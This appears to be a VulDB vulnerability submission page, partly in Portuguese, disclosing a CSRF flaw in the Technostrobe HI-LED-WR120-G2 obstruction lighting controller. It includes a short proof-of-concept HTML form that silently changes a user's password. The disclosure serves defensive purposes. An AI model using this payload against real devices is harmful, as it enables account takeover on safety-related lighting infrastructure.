Submeter #783325: Technostrobe HI-LED-WR120-G2 Obstruction Lighting Controller 5.5.0.1R6.03.30 Cross-Site Request Forgery (CSRF)informação

TítuloTechnostrobe HI-LED-WR120-G2 Obstruction Lighting Controller 5.5.0.1R6.03.30 Cross-Site Request Forgery (CSRF)
DescriçãoThe application does not implement CSRF protection mechanisms for sensitive operations. Vulnerable Endpoint: POST /LoginCB HTTP/1.1 Host: <target> Cookie: session=valid_session user=user&password=useruser1! Proof of Concept: &lt;form method="POST" action="http://technostrobe.shiky.demo:58746/LoginCB"&gt; &lt;input type="hidden" name="updatePassword" value="0"&gt; &lt;input type="hidden" name="userId" value="3"&gt; &lt;input type="hidden" name="newPassword" value="dXNlcnVzZXIxIQ="&gt; &lt;input type="submit" value="Submit Request"&gt; &lt;/form&gt; Root Cause: No CSRF token validation No origin/referrer validation Server trusts browser-sent cookies Impact: Account takeover Unauthorized configuration changes
Fonte⚠️ https://github.com/shiky8/my--cve-vulnerability-research/blob/main/my_VulnDB_cves/CVE-TECHNOSTROBE-04-CSRF.md
Utilizador
 shiky8 (UID 96565)
Submissão20/03/2026 01h24 (há 22 dias)
Moderação04/04/2026 16h41 (16 days later)
EstadoAceite
Entrada VulDB355342 [Technostrobe HI-LED-WR120-G2 5.5.0.1R6.03.30 Falsificação de Pedido entre Sites]
Pontos20

VoltarVisão GeralPróximo

Want to know what is going to be exploited?

We predict KEV entries!